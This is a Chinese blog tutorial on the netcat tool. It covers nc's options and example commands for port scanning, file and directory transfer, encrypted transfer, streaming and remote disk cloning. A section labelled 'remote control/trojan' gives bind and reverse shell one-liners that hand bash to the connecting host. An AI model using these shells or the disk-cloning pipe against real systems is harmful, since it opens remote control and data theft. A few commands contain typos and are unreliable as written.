• nc工具详解


    nc 安装
        yum install -y nc
    参数:

     1 Command Summary:
     2         -4        Use IPv4
     3         -6        Use IPv6
     4         -D        Enable the debug socket option
     5         -d        Detach from stdin  #无图形界面使用后台模式
     6         -h        This help text     #获取帮助信息
     7         -i secs        Delay interval for lines sent, ports scanned #延时设置,端口扫描时使用
     8         -k        Keep inbound sockets open for multiple connects
     9         -l        Listen mode, for inbound connects #监听入站信息
    10         -n        Suppress name/port resolutions  #后跟ip地址
    11         -p port        Specify local port for remote connects
    12         -r        Randomize remote ports
    13          -S        Enable the TCP MD5 signature option
    14         -s addr        Local source address  #发送数据源地址
    15         -T ToS        Set IP Type of Service
    16         -C        Send CRLF as line-ending
    17         -t        Answer TELNET negotiation  #以TELNET的形式应答入站请求
    18         -U        Use UNIX domain socket
    19         -u        UDP mode  #使用UDP协议
    20         -v        Verbose   #显示详细的输出内容
    21         -w secs        Timeout for connects and final net reads  #超时秒数
    22         -X proto    Proxy protocol: "4", "5" (SOCKS) or "connect"
    23         -x addr[:port]    Specify proxy address and port
    24         -z        Zero-I/O mode [used for scanning] # I/O 模式,扫描时使用

    nc作为客户端: 

    1     nc -nvz 10.104.11.107 1-65535  默认探测TCP端口
    2     nc -nvzu  10.104.11.107 1-65535 #探测UDP端口  

    作用:
        传输文本信息

    1      nc -l  9999  #客户端开启一个端口
    2      netstat -pantu |grep 9999    #查看33端口是否打开
    3      nc -l 9999 >ps.txt 监听到的信息输出到pa.txt

        进行连接:

    1    nc -nvv 10.104.11.128 9999
    2    ls -l |nc -nv 10.104.11.128 9999  输出信息打印到10.104.11.128主机

        传输文件

    1      A: nc  -l 999>1.html
    2      B: nc -nv 10.104.11.128 9999<1.html 

        或者     

    1    A:nc -l 9999<ps.txt
    2    B: nc -nv 10.104.11.128 9999 >ps.txt

     传输目录(先打包)

    1   A:tar -cvf - music/|nc -l 9999
    2   B:nc -nv 10.104.11.128 9999|tar -xvf -

        加密传输文件(先加密在传送再解密) 

    1     A:nc -l 333|mcrypt --flush -Fbqd(加密) -a rijndael-256 -m ecb >1.mp3
    2     B:mcrypt --flush -Fbq(解密) -a rijndael-256 -m ecb <1.mp3 |nc -nv 10.104.11.128 9999

        #对称加密两边密码要相同
        流媒体服务

    1    A: cat 1.mp3|nc -l 9999
    2    B: nc -nv 10.104.11.107|mplayer -vo xll -cache 3000- #指定媒体播放器进行播放

        端口扫描 

    1 nc -nvz 10.104.11.128

        远程克隆硬盘

    1   A:nc -l 9999|dd of =/dev/sda
    2   B:dd if=/dev/sda |nc -nv 10.104.11.128 9999

        远程控制/木马

    1 正向:
    2         A:nc -l 9999 -c bash
    3         B:nc 10.104.11.128
    4 反向:
    5         A:nc -l 9999
    6         B:nc 10.104.11.128 9999 -c bash 

        注:Windows用户把bash改成cmd
        缺点:缺乏加密与身份认证

  • 相关阅读:
    Android HandlerThread
    JavaScript数据类型
    Android:VideoView
    我是如何跟踪log4j漏洞原理及发现绕WAF的tips
    Dubbo的反序列化安全问题——kryo和fst
    使用移动硬盘快速安装win7(附BIOS设置)
    OpenStack Swift All In One安装部署流程与简单使用
    C语言浮点数运算
    使用注册表文件(REG)添加、修改或删除Windows注册表项和值
    Linux之TCPIP内核参数优化
  • 原文地址:https://www.cnblogs.com/someone9/p/8667117.html
Copyright © 2020-2023  润新知